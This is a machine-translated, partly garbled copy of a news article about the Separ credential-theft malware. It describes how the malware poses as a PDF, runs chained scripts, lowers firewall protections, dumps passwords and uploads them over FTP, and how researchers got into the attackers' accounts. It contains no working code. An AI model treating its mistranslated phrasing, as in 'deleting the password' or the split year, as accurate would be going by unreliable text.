قالب وردپرس درنا توس
Home / Technology / Hard-to-detect credential-theft malware has infected 1,200 and is still going

Hard-to-detect credential-theft malware has infected 1,200 and is still going



  Hard-to-detect credential theft malware has infected 1,200 and continues to work

A seemingly simple malware attack has stolen a wide range of credentials from thousands of computers in recent weeks and continues to steal more, a researcher notified on Tuesday

The ongoing attack is the latest wave of Separ, a credential thief who has been known to exist since at least the end of 201

7, said a researcher with the security firm Deep Instinct. In recent weeks, the researcher said, Separ is back with a new version that has proved surprisingly adept at evading malware detection software and services. The source of its success: a combination of short scripts and legitimate executable files that are used so often for benevolent purposes in which they blend perfectly. The use of spurious malware based on legitimate apps and utilities has been called "living off the ground" "and
it has been used in a variety
of highly effective campaigns in recent years.

The last Separ comes in what appears to be a PDF document. Once clicked, the file runs a chain of other apps and file types commonly used by system administrators. An inspection of the servers used in the campaign shows that, so far, has collected credentials belonging to about 1,200 organizations or individuals. The number of infections continues to rise, indicating that the Spartan approach was effective in helping him fly under the radar.

"Although the attack mechanism used by this malware is very simple and no attempt has been made by the attacker To circumvent the analysis, the growth in the number of victims reported by this malware shows that simple attacks can be very effective, "wrote Guy Propper, head of the Deep Instinct threat intelligence team in a blog post. "The use of legitimate scripts and binaries, in a scenario" live off the ground, "means that the attacker manages to circumvent the detection, despite the simplicity of the attack. [19659003]

 The contents of the first batch script. "Src =" https://cdn.arstechnica.net/wp-content/uploads/2019/02/batch-script-1-300x117.png "width = "300" height = "117" srcset = "https: // cdn.arstechnica.net/wp-content/uploads/2019/02/batch-script-1-640x249.png 2x
Enlarge / The contents of the first group script.

Deep Instinct

In this last wave, Separ is enclosed in a self-extracting executable file that uses an & # 39; icon to disguise itself as a PDF document. a chain of files is executed that starts with a Visual Basic script, in turn, executes a batch script, the batch script sets several directories, copies the files and then starts a second batch script, the second script opens a fake image to hide command windows, lowers firewall protections, and saves the results of an ipconfig / all command to a file.

 The content of a second batch script. "src =" https://cdn.arstechnica.net/wp-content/uploads/2019/02/batch-script-2-300x461.png "width =" 300 "height =" 461 "srcset =" https: / / cdn.arstechnica.net/wp-content/uploads/2019/02/batch-script-2.png 2x
Enlarge / The content of a second batch script.

Deep Instinct [19659007] The batch file then executes four executable tools used for legitimate purposes: the first two executable files are the tools for deleting the password from the SecurityXploded security research organization. The third executable runs the legitimate NcFTP client to load stolen data on previously configured accounts. Hosting hosting The fourth executable file includes the legitimate apps xcopy.exe, attrib.exe and sleep.exe that it needs to perform trivial tasks.

 An email password dump with credentials written and ipconfig data. "Src =" https://cdn.arstechnica.net/wp-content/uploads/2019/02/email-password-dump -300x196.png "width =" 300 "height =" 196 "srcset =" https: // cdn.arstechnica.net/wp-content/uploads/2019/02/email-password-dump.png 2x
zoom in / An email password dump with credentials written and ipconfig data.

Deep Instinct

"As you can see above, attackers do not try to hide their intentions and do not use obfuscation or evasion techniques," wrote Propper. "Also, all the names of the output files and the credentials used by the attackers are hard-coded in the scripts."

Turning the tables on the bad guys

The hard-coded credentials allowed Deep Instinct to turn the tables of attackers and access two of the accounts used to store the stolen data. later, the researchers obtained access to eight other accounts: starting from Tuesday afternoon, the accounts stored credentials belonging to about 1,000 individuals and 200 organizations. Credentials have grown steadily over the past few weeks, and researchers suspect there may be additional accounts that retain even more.

So far, Propper said, Freehostia officials did not respond to Deep Instinct's private messages that reported abuse of the hosting service. A message that Ars sent to Freehostia looking for comments for this post remained unanswered. Propper said that Deep Instinct has informed infected people and organizations that their credentials have been collected.

The only thing needed for the recent Separ campaign was, at least initially, for an end user to click on a masked executable. Propper said, over time, a growing number of antimalware vendors came to detect the attack. However, ongoing attacks point out that despite the increasing sophistication of many of today's malware attacks, simple and scattered hackers remain painfully effective.


Source link